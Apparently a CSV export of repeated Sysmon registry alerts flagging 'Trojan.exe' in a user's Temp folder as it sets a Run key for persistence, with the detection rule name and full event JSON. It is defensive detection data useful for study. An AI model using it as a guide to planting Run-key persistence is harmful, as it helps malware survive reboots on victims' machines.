..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:32.967286200Z"",""eventRecordID"":""1841"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:32.965\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:32.965"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:35.688",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:31.949 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:31.951171000Z"",""eventRecordID"":""1840"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:31.949\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:31.949"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:34.454",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:30.934 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:30.935736100Z"",""eventRecordID"":""1839"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:30.934\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:30.934"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:33.298",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:29.918 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:29.921317200Z"",""eventRecordID"":""1837"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:29.918\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:29.918"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:32.344",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:28.902 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:28.910730600Z"",""eventRecordID"":""1836"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:28.902\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:28.902"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:32.204",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:27.887 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:27.889382400Z"",""eventRecordID"":""1834"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:27.887\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:27.887"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:30.985",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:26.856 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:26.857190800Z"",""eventRecordID"":""1832"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:26.856\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:26.856"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:30.001",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:25.824 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:25.828220100Z"",""eventRecordID"":""1830"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:25.824\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:25.824"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:29.970",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:24.809 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:24.815717800Z"",""eventRecordID"":""1829"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:24.809\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:24.809"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John 
Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:27.783",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:23.798 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:23.802274800Z"",""eventRecordID"":""1828"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:23.798\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:23.798"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:25:26.561",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:22.793 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-24T16:25:22.795561800Z"",""eventRecordID"":""1827"",""processID"":""2176"",""threadID"":""3164"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-24 16:25:22.793\r\nProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00}\r\nProcessId: 6484\r\nImage: C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-24 16:25:22.793"",""processGuid"":""{df9fc3d3-9fd5-5eca-0000-00102b300b00}"",""processId"":""6484"",""image"":""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:25:25.344",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-24 16:25:21.777 +ProcessGuid: {df9fc3d3-9fd5-5eca-0000-00102b300b00} +ProcessId: 6484 +Image: C:\Users\John Williams\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 